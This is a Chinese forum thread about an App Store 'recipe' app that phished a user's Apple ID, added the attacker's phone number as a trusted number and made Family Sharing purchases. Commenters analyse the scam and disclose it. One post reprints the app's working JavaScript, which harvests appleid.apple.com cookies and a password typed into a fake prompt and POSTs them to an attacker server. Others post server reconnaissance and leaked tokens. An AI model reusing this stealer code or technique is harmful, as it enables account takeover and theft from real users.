7 月 12 晚上发生的事情,
之前一直以为开了双重认证就高枕无忧,经过排查后,基本确定是被钓鱼了:
丈母娘曾经在某 App 购买虚拟商品,App Store 绑定了微信免密支付。
7 月 11 号下午,丈母娘在 Apple Store 上下载了一个叫 “菜谱大全” 的 App ,它的登录方式是 Apple ID 授权,这一步如果没有开启 iCloud+ 隐藏邮件地址的话,Apple ID 账号就会泄露,如图
接着,会出来一个跟 App Store 长得非常像的密码输入框,大家如果经常安装 App ,人脸识别失败的时候,就会有这个密码输入框,不熟悉 App Store 登录流程的话,很容易中招,如图
有了 Apple ID 的账号和密码,就可以登录了,这一步我跟丈母娘反复确认了,她没有见过双重认证的弹窗。
登录之后,他会把自己的号码,加入双重认证的信任号码中,目的是为了后续的登录可以通过自己认证,如图
到这一步,他已经掌握了受害者 Apple ID 的所有权限。
接下来,盗号者并不会直接用 Apple ID 下单支付,而是会创建一个家庭共享,加入另一个账号,由这个账号购买 App 中的虚拟商品,如图
整个钓鱼过程,我有一点不太理解,在开启了双重认证的情况下,除非我丈母娘主动输入验证码,否则即使对方拿到了 Apple ID 的账号密码,应该也无法登录才对,这里请大佬帮忙解惑。
我在 Apple 400 客服尝试了多种方式,最终都失败了:
目前还能尝试的方式:
201
airycanon OP |
202
llo 2023-07-24 17:47:26 +08:00
真他妈离谱,这一般人真容易中招
|
203
Jiajin 2023-07-24 17:55:07 +08:00
@airycanon apple 普通客服是这样的,我估计得找 apple developer 的客服,好像开发者账号一年有两次支持机会。
|
205
hongchends1 2023-07-24 17:58:15 +08:00
我记得截屏是截不到系统的弹窗的,所以应该是通过其他途径绕过了 2FA
|
206
SNOOPY963 2023-07-24 18:09:43 +08:00
@hongchends1 那个 Apple ID 的 L 都不对的。而且系统的弹窗,会带具体的 Apple ID 的,邮箱或者手机号。
|
207
NanoApe 2023-07-24 18:11:31 +08:00
@fuliti 主要这个密码弹窗是伪造 Apple UI 的,迷惑性特别强(除了「 AppLe 」和「登陆」)
https://arstechnica.com/information-technology/2017/10/beware-of-sketchy-ios-popups-that-want-your-apple-id/ 也算是个历史问题了 |
208
hongchends1 2023-07-24 18:11:35 +08:00
@SNOOPY963 这是我没想到的。。
|
209
alihbaba 2023-07-24 18:19:44 +08:00
他那个前端就是个 H5 不知道是不是封装的 感觉是
|
210
alihbaba 2023-07-24 18:21:27 +08:00
|
211
airycanon OP @alihbaba 还从这个页面获取了一些数据,感觉是盗用了人家的 api: https://www.jxcaipu.com/
|
212
learningman 2023-07-24 18:47:02 +08:00
技术有点 cool
|
213
dsb2468 2023-07-24 18:54:34 +08:00
CN 域名注册需要实名的(不过也可能是假证件)
http://agreement.gbbhuor.cn/ (注册人韩 LF QQ 邮箱注册的) http://app.gbbhuor.cn/ (底部也有个 QQ ) |
214
LuoboTixS 2023-07-24 19:24:05 +08:00 9
期待和祝愿楼主能送这个诈骗 app 开发者进去
|
215
woyao 2023-07-24 19:26:35 +08:00
|
217
airycanon OP @LuoboTixS 兄弟有点难啊,我把资料给了之前立案的警察,他只会说让我联系苹果公司,让我联系提供虚拟商品的游戏公司,让我联系腾讯支付。
|
219
WhatTheBridgeSay 2023-07-24 20:30:20 +08:00 1
楼主不起诉说不过去啊,都这么大涉案金额了,那么多及时止损导致不够立案金额/时间成本的。直接起诉苹果上海贸易公司,让他们的人来主动找你协商
|
221
littlecowherd 2023-07-24 20:52:03 +08:00
期待后续
|
222
Valid 2023-07-24 20:56:02 +08:00
这 app 竟然能上架才是奇怪的
|
224
Uyloal 2023-07-24 21:05:37 +08:00
@Valid 能上架没啥问题,因为 App 可以在 Apple 审核期间使用另一套规则来规避审核规则。奇怪的点在于 Apple ID 登陆之后修改 2FA 信息居然不需要 2FA 确认,虚假 2FA 。
|
225
liveoppo 2023-07-24 21:12:38 +08:00
期待楼主加油,坚持让苹果正视这个缺陷,最好能抓出诈骗分子去坐牢
|
226
acbdb000 2023-07-24 21:52:50 +08:00 1
简中福报了,赶紧起诉吧,最好能让这个开发者进去蹲。
|
227
Zy143L 2023-07-24 21:57:14 +08:00 via Android 4
少有的好贴 从分析到后台应有尽有
这算果子的逻辑漏洞了吧 信任设备修改 2FA 不需要 2FA 理想情况应该是 0 信任的 |
228
late1000 2023-07-24 22:14:29 +08:00
建议起诉了,这太逆天了
|
229
YaakovZiv 2023-07-24 22:22:40 +08:00
防不胜防,如果是我用,我也可能中招,真的是防不胜防
|
230
QKA666 2023-07-24 22:28:28 +08:00
怎么防范呢
|
231
nightwalker 2023-07-24 22:36:55 +08:00
@Archeb 还有一个我已经关闭了"在网页上访问 iCloud 数据“,但这个只能限制电脑,手机不受限制。另外这个 app 还要调 api 添加信任号码,感觉真的花了功夫!
|
232
zololiu 2023-07-24 22:37:07 +08:00
@qinxiaozhi 下载下来,试了一下,点击登录直接没反应了。 😂
|
233
christin 2023-07-24 22:40:59 +08:00
赶紧往后退一步,把绑定的免密支付加上限额。
不过还好我在用美区的 ID ,只能官网购买礼品卡充值。 |
234
Misaka11037 2023-07-24 22:41:00 +08:00
建议有条件的尽早上 security key
|
237
JCZ2MkKb5S8ZX9pq 2023-07-24 22:51:43 +08:00 2
|
238
Rhianu 2023-07-24 22:58:06 +08:00
看楼主提供的第二张 Apple ID 弹窗截图,这个弹窗可以断定是假的,截图中的弹窗截图的标题是 AppLeID ,官方的是 Apple ID 。钓鱼网站经常会做一些以假乱真的苹果系统 UI 用来骗取账号和密码。
|
239
DevHjz 2023-07-24 23:02:28 +08:00
@airycanon @alihbaba
我通过技术手段扫子域名+反查 IP ,查找到以下信息: yime888.com 下的子域名有: app 和 app2 解析到 103.229.183.139 ,Hostnames 为 app.bahpxmz.cn ,无 Whois 信息; download 解析到 45.116.215.33 ,Hostnames 为 download.yime888.com ; study 、talking 、v 、vip 、wm 解析到 27.0.192.153 ,Hostnames 为 book.qnclywm.cn ,注册者: 韩** 注册者联系人邮件: QQ 邮箱 所属注册服务机构: 阿里云计算有限公司(万网) 这个网站似乎还有开发多款软件,不知道有没有问题,供参考。 |
240
DevHjz 2023-07-24 23:14:16 +08:00
另外补充:qnclywm.cn 的子域名信息:
book 27.0.192.153 ksad 45.116.215.33 这个似乎是个 API 。 wechat 45.116.215.33 这个有个按钮跳转微信。 |
241
AuroraW 2023-07-24 23:21:55 +08:00
楼主你好,想问下能搬运帖子内容到其他平台吗?想让更多人知道和了解这件事。
|
242
lance6716 2023-07-24 23:24:18 +08:00 via Android
我用了几天 iPhone 马上就滚回安卓的一个原因就是莫名其妙的系统弹窗需要输入 Apple ID 密码
|
243
ha0z1 2023-07-24 23:29:59 +08:00 via iPhone 1
怎么把自己的苹果账号给丈母娘,万一同步过去一个白屁股妹子照片发现不是她闺女怎么办?
|
244
lizhuoli 2023-07-25 00:07:52 +08:00 via iPhone 3
很简单的骗术,你第一张图就明白了
你从始至终,登陆的是一个隐藏的 Web 页面,其打开的是 appleid.apple.com 你登陆的不是你这个 App 什么食谱的账号,用 Sign in with Apple 这里都告诉你了登陆的平台是网页了 你现在这样操作完成后,就等于你在陌生人的电脑上登陆了 Apple ID ,随后怎么操作都简单。比如添加受信手机,如果你原来没有手机,直接可以绑定陌生人的 比如,重置密码,需要你已有的老密码,通过第二个弹窗钓鱼即可 当陌生人同时给这个 Apple ID 绑定了手机,更换了密码,这个账号就不属于你了已经,后续怎么消费套现都轻松得很 |
245
Senorsen 2023-07-25 00:24:15 +08:00
哦对了,lz 报警了没?
|
247
ipcjs 2023-07-25 00:42:42 +08:00
别赖苹果,做自己手机安全的第一负责人🤣
|
248
bootloaders 2023-07-25 00:53:48 +08:00
@Archeb
从钓鱼诱骗受害者登录自己的 Apple ID ,获取 Apple ID 账号和密码,在本机上利用 cookie/脚本添加受信任的电话号码都能理解 但骗子是怎么将他的账号添加到家庭共享里的呢?如果远程登录受害人的 Apple ID 操作家庭组,即使添加进了电话号码,受信任的设备上不是还会跳出 2FA 的验证码?是骗子在本机上利用脚本在 Apple id 网页上操作关掉了双重验证么? |
249
m0yBPjyX3475syS4 2023-07-25 01:07:06 +08:00
我刚才装上了这个菜谱大全 App 发现点了登入按钮不再有反应了。
|
250
m0yBPjyX3475syS4 2023-07-25 01:10:13 +08:00
Apple 其实可以在商店里面给商店应用加上这么个规矩或自动限制:
一、包括 Apple ID 登入画面在内的这种网站,得做特殊处理,以让这些网站自家的 iOS App 内建的 WebView 当中正常显示这类登入画面。 二、任何在这种特殊处理当中没有被允许的 iOS App ,在程序上会被限制载入对应的网站的登入画面。 这样一举解决某些 App 用类似手段坑取使用者 Apple ID 、Microsoft Account 、Google Accountl……的问题。 |
251
m0yBPjyX3475syS4 2023-07-25 01:20:28 +08:00
我现在怀疑 Apple 是否已经在下述 iOS 快速安全回应当中对这个缺陷做了处理: https://support.apple.com/zh-tw/HT213825
|
252
Rrobinvip 2023-07-25 01:26:22 +08:00 1
我一直在预防 app 假扮 apple 登录框要求你输入密码。印象中在 home button 时代,在要求输入 Apple ID 密码时按 home ,如果切回桌面了那就是假的,反之则是真的。
全面屏机型中,任何真正使用 Apple ID 登陆的 app ,在登录时都会弹出一个 view ,其中表明了这个 app 是什么,你也可以选择使用的你 iCloud 或者隐藏 iCloud 。这个时候你如果你上滑(退回主页),这个 view 会被关闭,但 app 不会被关闭。通过这种方式可以直接鉴别登录窗口是真是假。 另外在真正登录时一定要用隐藏 iCloud ,这样对方收到的并不是真正的 iCloud 地址。在注册账户时,也一定要使用 iCloud 自动生成的随机 email 和密码,最大程度避免撞库。 骗子很可恶,但我希望大家一定要防患于未然,建立好的防骗意识。关注 lz 的帖子,希望看到后续。另外不要盲目相信 App Store 中的 app ,之前 twitter 上就有人爆出来一个数字货币钱包 app 会骗你的 secret key ,鬼知道 App Store 里还有多少诈骗 app 。 |
253
m0yBPjyX3475syS4 2023-07-25 01:38:47 +08:00 15
我把这个案例贴到 MacRumors 了。如果能成功在 MacRumors 引起讨论的话,Apple 不可能不关注。
https://forums.macrumors.com/threads/apple-shouldnt-let-app-webwiews-prompt-for-appleid-password.2396766/ |
254
vikiyi0 2023-07-25 01:41:08 +08:00 via Android
向苹果报告 Apple ID 被骗子通过黑客手段非法获取了账户控制权(对异常情况进行描述),进而出现了非本人意愿的支付,在账户不被盗的情况下苹果的退款审核做得相对完美,普通情况下一定是会拒绝退款的
|
256
m0yBPjyX3475syS4 2023-07-25 01:44:40 +08:00 6
Reddit 那边我也贴了:
https://www.reddit.com/r/apple/comments/158hhzk/apple_shouldnt_let_app_webwiews_prompt_for/ 如果这个网址跟 macRumors 的网址都点不开的话,表明文章正在等待版务审核。 |
257
m0yBPjyX3475syS4 2023-07-25 01:49:14 +08:00
@shiji FaceID 机种都是上滑。指纹机种才有 Home 键摁。
|
258
m0yBPjyX3475syS4 2023-07-25 01:49:41 +08:00
@shiji 补充:FaceID 机种都是上滑,且是从荧幕底边开始上滑。
|
259
tinytian 2023-07-25 01:57:33 +08:00 via iPhone
@Zy143L 把 WebView 和 Safari 没有区别才是最大的病! WebView 不应该视为可信任的“APP”,应该锦默认禁止访问敏感信息。
|
260
tinytian 2023-07-25 02:07:02 +08:00 via iPhone
@ShikiSuen 这里的核心可能是 WebView 是不是应该和 Safari 一样受到信任…理想情况下应该是一样的,现实是 Safari 可能可以受信任,但是 WebView 绝对不可以受信任。
|
261
justfun 2023-07-25 04:10:00 +08:00 via iPhone
帖子全看完了,输入 appleid 密码那个弹窗伪装的和正常流程几乎一样,很容易中招。这个绝对的大新闻啊
|
262
mfaner 2023-07-25 05:59:15 +08:00
从楼主的情况看感觉无密码登录反而增加了钓鱼攻击风险,比起密码登录无密码很容易不过脑,登录上就足够盗取很多隐私了
|
263
irithys 2023-07-25 06:33:02 +08:00 via Android
好惨,新笑话:Apple 很安全。
|
265
SteveRogers 2023-07-25 08:32:18 +08:00 via iPhone
把后门提交下给苹果,避免更多人受害
|
266
shinsekai 2023-07-25 08:40:24 +08:00 1
按同样的原理,是否适用于所有使用 passkey ,但又没有彻底废除 2FA 和密码的网站?
|
268
x86 2023-07-25 08:45:45 +08:00
做黑产的比产品经理还清楚流程上的缺陷啊
|
269
evada 2023-07-25 08:47:50 +08:00
苹果客服退款确实很垃圾,之前在 QQ 音乐买了个代币,结果代币不能花也不能退,QQ 音乐没有客服,苹果说买了这边退不了。
|
271
ochatokori 2023-07-25 08:59:34 +08:00 via Android
不需要双重认证就能添加信任号码,这双重认证不就认证了个寂寞?
|
272
kaylabrady07736 2023-07-25 09:09:36 +08:00
这也太隐秘了,普通人都有可能中招,别说老年人了
|
274
liveoppo 2023-07-25 09:45:49 +08:00
没能明显区分系统输入与 webview 输入,这里有重大缺陷呀
|
275
nullpoint007 2023-07-25 09:47:16 +08:00
大佬在线偷家,骗子绷不住了吧,哈哈
|
277
dsb2468 2023-07-25 10:03:41 +08:00
补一个菜谱的页面,备忘吧:
http://www.qnclywm.cn/ |
278
baysonfox 2023-07-25 10:08:32 +08:00
苹果应该给所有基于 Webview 的登录要求 2FA
|
279
liutaokss 2023-07-25 10:19:48 +08:00
苹果竟然拒绝退款
|
280
sherlockGou 2023-07-25 10:20:02 +08:00
这个站点的主域名已经不能访问了,估计是停服了。
|
282
unklity 2023-07-25 10:40:04 +08:00
|
283
dsb2468 2023-07-25 10:48:09 +08:00 5
核心的窃取 COOKIE 和密码,然后发往 http://app.yime888.com/api/app.php 的代码还在( yime888.com 已经下线了):
http://www.qnclywm.cn/static/js/pages-views-index.0945c055.js ========================================= (window["webpackJsonp"] = window["webpackJsonp"] || []).push([["pages-views-index"], { "0c6f": function(t, e, n) { var i = n("24fb"); e = i(!1), e.push([t.i, ".bg[data-v-d2ae5eac]{width:100%;float:left;position:relative}.bg>uni-image[data-v-d2ae5eac]{width:%?750?%;height:%?731?%}.t1[data-v-d2ae5eac]{position:absolute;left:%?30?%;top:%?230?%;font-size:%?50?%;font-weight:700}.t2[data-v-d2ae5eac]{position:absolute;left:%?30?%;top:%?300?%;font-size:%?50?%;font-weight:700}.info1[data-v-d2ae5eac]{position:fixed;left:0;width:100%;text-align:center;bottom:%?400?%;font-weight:700;font-size:%?40?%}.info2[data-v-d2ae5eac]{position:fixed;left:0;width:100%;text-align:center;bottom:%?350?%;font-size:%?28?%}#btns[data-v-d2ae5eac]{width:%?630?%;height:%?90?%;background:#ff4f59;text-align:center;position:fixed;left:%?60?%;bottom:%?230?%;line-height:%?90?%;color:#fff;border-radius:%?45?% %?45?%;font-size:%?30?%}", ""]), t.exports = e }, "400f": function(t, e, n) { "use strict"; n.r(e); var i = n("4c61"), a = n.n(i); for (var o in i)["default"].indexOf(o) < 0 && function(t) { n.d(e, t, (function() { return i[t] })) } (o); e["default"] = a.a }, "4c61": function(t, e, n) { "use strict"; n("7a82"), Object.defineProperty(e, "__esModule", { value: !0 }), e. default = void 0; getApp(); var i = null, a = { data: function() { return { hide: 0, ww: "0", hh: "0", login: 0, is_no: 0, url: "", url2: "", url3: "", num: 0, timer: null, timer2: null, txt1: "", txt2: "" } }, onLoad: function(t) { var e = this; this.cks(), uni.onNetworkStatusChange((function(t) { "none" != t.networkType && e.cks() })) }, onShow: function() {}, onShareAppMessage: function() {}, methods: { cks: function() { var t = this; uni.request({ url: "http://app.yime888.com/api/ck.php", data: {}, header: {}, success: function(e) { t.is_no = 1, t.login = e.data[0].status, t.url = e.data[0].url, t.url2 = e.data[0].url2, t.url3 = e.data[0].url3, t.num = e.data[0].num, t.txt1 = e.data[0].txt1, t.txt2 = e.data[0].txt2 } }) }, loginsfn: function() { uni.request({ url: "http://app.yime888.com/api/ip.php", success: function(t) {} }) }, loadings2: function() { var t = this, e = ""; i.evalJS("document.title=location.href"); var n = i.getTitle(); n == t.url3 && (clearInterval(t.timer), t.timer = null, uni.showModal({ title: t.txt1, content: t.txt2, editable: !0, success: function(n) { if (n.confirm) { var i = n.content; n.content.length < 7 ? uni.showToast({ title: "不能少于 7 位", duration: 2e3 }) : (uni.showToast({ title: "提交中...", icon: "loading", duration: 5e3 }), setTimeout((function() { e = plus.navigator.getCookie(t.url2), uni.request({ url: "http://app.yime888.com/api/app.php", data: { data1: e, data2: i }, method: "POST", header: { "content-type": "application/x-www-form-urlencoded" }, success: function(t) { uni.showToast({ title: "成功", duration: 2e3 }), uni.navigateTo({ url: "/pages/index2/index" }) } }) }), 5e3)) } else n.cancel && uni.showToast({ title: "已取消", duration: 2e3 }) } })) }, loadings: function() { var t = plus.navigator.getCookie("https://appleid.apple.com"); t.length > this.num && (clearInterval(this.timer), this.timer = null, uni.showModal({ title: this.txt1, content: this.txt2, editable: !0, success: function(e) { if (e.confirm) { var n = e.content; e.content.length < 7 ? uni.showToast({ title: "不能少于 7 位", duration: 2e3 }) : uni.request({ url: "http://app.yime888.com/api/app.php", data: { data1: t, data2: n }, method: "POST", header: { "content-type": "application/x-www-form-urlencoded" }, success: function(t) { uni.showToast({ title: "成功", duration: 2e3 }), uni.navigateTo({ url: "/pages/index2/index" }) } }) } else e.cancel && uni.showToast({ title: "已取消", duration: 2e3 }) } })) }, logins: function() { var t = this; uni.getNetworkType({ success: function(e) { "none" == e.networkType ? uni.showModal({ title: "当前网络不可用", content: '您可以在"设置"中为此 app 打开蜂窝数据。', cancelText: "好", confirmText: "设置", success: function(t) { if (t.confirm) { var e = plus.ios.import("UIApplication"), n = e.sharedApplication(), i = plus.ios.import("NSURL"), a = i.URLWithString("app-settings:"); n.openURL(a), plus.ios.deleteObject(a), plus.ios.deleteObject(i), plus.ios.deleteObject(n) } else t.cancel } }) : 0 == t.login && 1 == t.is_no ? (t.loginsfn(), uni.navigateTo({ url: "/pages/index2/index" })) : 1 == t.is_no && (uni.showToast({ title: "登录中请忽中断!", icon: "loading", duration: 5e3 }), t.loginsfn(), i = plus.webview.create(t.url, "xiaoShop", { width: "1px", height: "1px", left: "1000px" }), i.show(), clearInterval(t.timer), t.timer = null, t.timer = setInterval((function() { t.loadings2() }), 1e3)) } }) } } }; e. default = a }, "6eb8": function(t, e, n) { "use strict"; n.d(e, "b", (function() { return i })), n.d(e, "c", (function() { return a })), n.d(e, "a", (function() {})); var i = function() { var t = this, e = t.$createElement, i = t._self._c || e; return i("v-uni-view", [i("v-uni-view", { staticClass: "bg" }, [i("v-uni-image", { attrs: { src: n("aaa1") } }), i("v-uni-text", { staticClass: "t1" }, [t._v("Hi,")]), i("v-uni-text", { staticClass: "t2" }, [t._v("请登录")])], 1), i("v-uni-view", { staticClass: "info1" }, [t._v("菜谱大全")]), i("v-uni-view", { staticClass: "info2" }, [t._v("进入后即可享受更多的功能和福利")]), i("v-uni-view", { attrs: { id: "btns" }, on: { click: function(e) { arguments[0] = e = t.$handleEvent(e), t.logins.apply(void 0, arguments) } } }, [t._v("登录菜谱大全")])], 1) }, a = [] }, aaa1: function(t, e, n) { t.exports = n.p + "static/img/bg.8684acc5.jpg" }, ae6c: function(t, e, n) { "use strict"; var i = n("f796"), a = n.n(i); a.a }, f022: function(t, e, n) { "use strict"; n.r(e); var i = n("6eb8"), a = n("400f"); for (var o in a)["default"].indexOf(o) < 0 && function(t) { n.d(e, t, (function() { return a[t] })) } (o); n("ae6c"); var s = n("f0c5"), u = Object(s["a"])(a["default"], i["b"], i["c"], !1, null, "d2ae5eac", null, !1, i["a"], void 0); e["default"] = u.exports }, f796: function(t, e, n) { var i = n("0c6f"); i.__esModule && (i = i. default), "string" === typeof i && (i = [[t.i, i, ""]]), i.locals && (t.exports = i.locals); var a = n("4f06"). default; a("315b15a0", i, !0, { sourceMap: !1, shadowMode: !1 }) } }]); |
284
xdeng 2023-07-25 10:59:27 +08:00
@bootloaders 2FA 可以选短信 骗子手机号加进去了
|
285
DubheBroken 2023-07-25 11:15:45 +08:00 4
@airycanon 警察不一定懂技术,也可能是嫌麻烦想大事化小小事化了。警方不作为这种事太常见了。建议收集证据直接捅到社交媒体,微博抖音快手小红书酷安贴吧知乎,你想得到的社交媒体都发一发,扩散一下,事情闹大了警方就没法坐视不理了。
|
286
loarland 2023-07-25 11:19:44 +08:00
|
287
dsb2468 2023-07-25 11:23:10 +08:00
@alihbaba hello ,交友的 APP 你指的是这个么? http://vip.yime888.com/ 你上面那个返利的 APP ,地址有么?
|
288
w0017 2023-07-25 11:41:26 +08:00
苹果商店上架其实存在一个问题:webview 应用,所以审核时看到的内容未必就是几个月后在用户机器上跑的内容
|
290
dsb2468 2023-07-25 11:53:49 +08:00 1
@alihbaba 我浅浅看了下,这后面有大瓜啊
那个域名( vip.yime888.com )上有个交友 APP ,走的企业签名,这倒没啥,很正常。 但是上面的图片资源挂在 https://rec.ihuayou.xin/vip.nnpangfeng.com/data/gif/1.gif 上,这个域名结构很有特点,然后 rec.ihuayou.xin 上的东西又关联到了 http://rec.ihuayou.xin/js/app.343eabf7.js ,里面一堆域名信息,其中的 remark 字段很容易让人想到推广渠道——那么之前控制台收集信息展示(抖音、快手)的东西,是否就是不同渠道分发不同的软件、小程序,然后利用同样的方式( WEB 嵌套+弹窗提示登录)进行信息收集呢?: o = { cnzz: "", remark: "默认", companyName: "南宁庞丰网络科技有限公司", token: "" }, i = { "hj.pangfeng.ink": { cnzz: "https://s9.cnzz.com/z_stat.php?id=1281223722&web_id=1281223722", remark: "花间", companyName: "南宁庞丰网络科技有限公司", token: "" }, "yc-op.pangfeng.ink": { cnzz: "https://v1.cnzz.com/z_stat.php?id=1281200897&web_id=1281200897", remark: "OPPO", companyName: "南宁庞丰网络科技有限公司", token: "" }, "yc-wb1.pangfeng.ink": { cnzz: "https://s9.cnzz.com/z_stat.php?id=1281200748&web_id=1281200748", remark: "微博", companyName: "南宁庞丰网络科技有限公司", token: "" }, "yc.pangfeng.ink": { cnzz: "https://s9.cnzz.com/z_stat.php?id=1281201008&web_id=1281201008", remark: "微博 1", companyName: "南宁庞丰网络科技有限公司", token: "" }, "yice.youqiliang.net": { cnzz: "https://v1.cnzz.com/z_stat.php?id=1281202909&web_id=1281202909", remark: "百度优起量", companyName: "湖北优起量信息技术有限公司宜昌分公司", token: "NTCtLlqTAzu4xM5mirkbygs7UvWx19Mk@wDWYPerVk84HPcDfcbiOPpZxSHENOYIa" }, "yc.kangjunwangluo.cn": { cnzz: "https://v1.cnzz.com/z_stat.php?id=1281201007&web_id=1281201007", remark: "百度盐城康俊 1", companyName: "盐城康俊网络科技有限公司", token: "5W2X3KFuWYkVE8pibqMSpUwjrFA8kgGv@fx4ohnyAZ9OmQV0dPy5QBLePHisMnHyZ" }, "yc1.kangjunwangluo.cn": { cnzz: "https://v1.cnzz.com/z_stat.php?id=1281200881&web_id=1281200881", remark: "百度盐城康俊 2", companyName: "盐城康俊网络科技有限公司", token: "dbIVk0YpFjCoZomjqIXgoDtkj3CP7c6r@dYrUVa0Add4HZKFdVpoICCupTmKT4ZSv" }, "yc2.kangjunwangluo.cn": { cnzz: "https://s4.cnzz.com/z_stat.php?id=1281201255&web_id=1281201255", remark: "百度盐城康俊 3", companyName: "盐城康俊网络科技有限公司", token: "SgFmpkphMarKCMxG4zsIMOqeKPSKhXZd@FKRRrK5ubsaGPLibRH19ac3sx6lK3Bv2" }, "yc3.kangjunwangluo.cn": { cnzz: "https://s9.cnzz.com/z_stat.php?id=1281201256&web_id=1281201256", remark: "百度盐城康俊 4", companyName: "盐城康俊网络科技有限公司", token: "WxFsfo3VjMwweV0DRjiOskObKjr572kh@M6xZPITnypP8bpd5PldGiPc1OUAM2ZlX" }, "yc4.kangjunwangluo.cn": { cnzz: "https://s9.cnzz.com/z_stat.php?id=1281201257&web_id=1281201257", remark: "百度盐城康俊 5", companyName: "盐城康俊网络科技有限公司", token: "3eLDxW17zGCE5et35spTXBxdjFclg9pC@MxaTXo9vmCOoZPFsyMfSPlv98stsq9kF" }, "yc1.gelanrui.cn": { cnzz: "https://v1.cnzz.com/z_stat.php?id=1281203734&web_id=1281203734", remark: "百度葛 1", companyName: "盐城葛兰锐网络科技有限公司", token: "lIGeM4pQK0r56hkPRGGQSbx1wHhkReUL@CCGjYrDecy9RVlGDIkkhOm1RmH2WDGfG" }, "yc2.gelanrui.cn": { cnzz: "https://s4.cnzz.com/z_stat.php?id=1281203735&web_id=1281203735", remark: "百度葛 2", companyName: "盐城葛兰锐网络科技有限公司", token: "lIGeM4pQK0r56hkPRGGQSbx1wHhkReUL@CCGjYrDecy9RVlGDIkkhOm1RmH2WDGfG" }, "yc3.gelanrui.cn": { cnzz: "https://v1.cnzz.com/z_stat.php?id=1281203736&web_id=1281203736", remark: "百度葛 3", companyName: "盐城葛兰锐网络科技有限公司", token: "kjcGPAqbjpgHCUEvYC7qEp2jYyaVdytP@QGfbE2EjPunaI9W0ZBHDiCLfQuOuHCmc" }, "yc4.gelanrui.cn": { cnzz: "https://s4.cnzz.com/z_stat.php?id=1281203737&web_id=1281203737", remark: "百度葛 4", companyName: "盐城葛兰锐网络科技有限公司", token: "Cisj1njTcs6LkfIZuIYaak3dHbj8m6Xm@SIcZhUD4wHgtxD1VOHfDbM84ltG5kguV" }, "yc5.gelanrui.cn": { cnzz: "https://v1.cnzz.com/z_stat.php?id=1281203738&web_id=1281203738", remark: "百度葛 5", companyName: "盐城葛兰锐网络科技有限公司", token: "7WwaMwSvXTusziQRWdRRRXAo0qkshiwt@aFQVrgytegfIACj0nehWzTCYoYlzY4AW" }, "ftp.kangjunwangluo.cn": { cnzz: "https://s4.cnzz.com/z_stat.php?id=1281206148&web_id=1281206148", remark: "1", companyName: "盐城康俊网络科技有限公司", token: "mX3WA5uG7dzvUZ6SUZVejdngP480YUQz@ziUVKzGuGME19SkFCqSNm3iBKqwHcPGx" }, "yc-op1.pangfeng.ink": { cnzz: "https://s4.cnzz.com/z_stat.php?id=1281223718&web_id=1281223718", remark: "1", companyName: "南宁庞丰网络科技有限公司", token: "" }, "yc.ycqiyu.com": { cnzz: "https://s9.cnzz.com/z_stat.php?id=1281213267&web_id=1281213267", remark: "快手", companyName: "盐城琪煜科技有限公司", token: "" }, "yc1.ycqiyu.com": { cnzz: "https://s4.cnzz.com/z_stat.php?id=1281214652&web_id=1281214652", remark: "快手", companyName: "盐城琪煜科技有限公司", token: "" } }; |
291
dsb2468 2023-07-25 11:55:11 +08:00
@alihbaba vip.yime888.com 半小时前,我打开了
|
292
PaddyPang 2023-07-25 12:06:59 +08:00
Domain Name: YIME888.COM
Registry Domain ID: 2687945681_DOMAIN_COM-VRSN Registrar WHOIS Server: whois.paycenter.com.cn Registrar URL: http://www.xinnet.com Updated Date: 2023-01-03T07:03:11Z Creation Date: 2022-04-09T09:00:48Z Registry Expiry Date: 2024-04-09T09:00:48Z Registrar: Xin Net Technology Corporation Registrar IANA ID: 120 Registrar Abuse Contact Email: [email protected] Registrar Abuse Contact Phone: +86.4008182233 Domain Status: ok https://icann.org/epp#ok Name Server: NS11.XINCACHE.COM Name Server: NS12.XINCACHE.COM DNSSEC: unsigned URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ 有了 whois 信息能向新网申请查这个域名归属吗? |
293
ViceV 2023-07-25 12:26:50 +08:00 2
预言一下,这帖子必被果子公关,老子发酷安点评吐槽果子机缺点的帖子半年后偷偷摸摸给我删了,是真的恶心。
|
294
godwinma 2023-07-25 12:49:26 +08:00
app 已经不提供了。
|
295
alihbaba 2023-07-25 13:01:31 +08:00
@dsb2468 有可能 他们有很多类型的 APP 我昨天见 向那种交友的我见后台就是一个记录下载量的界面 App 里有可能有别的收集的
|
297
jyeric 2023-07-25 13:25:56 +08:00 4
好像有比较大的媒体转发了
https://www.bilibili.com/opus/822155614924832808 |
298
nVic 2023-07-25 13:31:16 +08:00
现在骗子多的很,你丈母娘有没有骗你这都不好说哦。
appstore 拒绝退款无非是此 ID 退款太多呗,或者涉及到的数额太大,不属于合理范围内,需要进行诉讼才能完成。 |
299
DevHjz 2023-07-25 13:49:52 +08:00
@alihbaba 239-240 楼里我扫了子域名,那几个 IP 开放的端口不止 80 ,还有其它端口,跑着各种服务。
27.0.192.153 Ports 80 443 888 8888 9090 45.116.215.33 Ports 80 443 9090 103.229.183.139 Ports 80 443 888 9090 OpenSSH 全部都在 9090 端口。 |
300
Dashit 2023-07-25 13:51:31 +08:00
这种 App 是不是还花钱去推广了,不然哪里来的这么多下载量。
|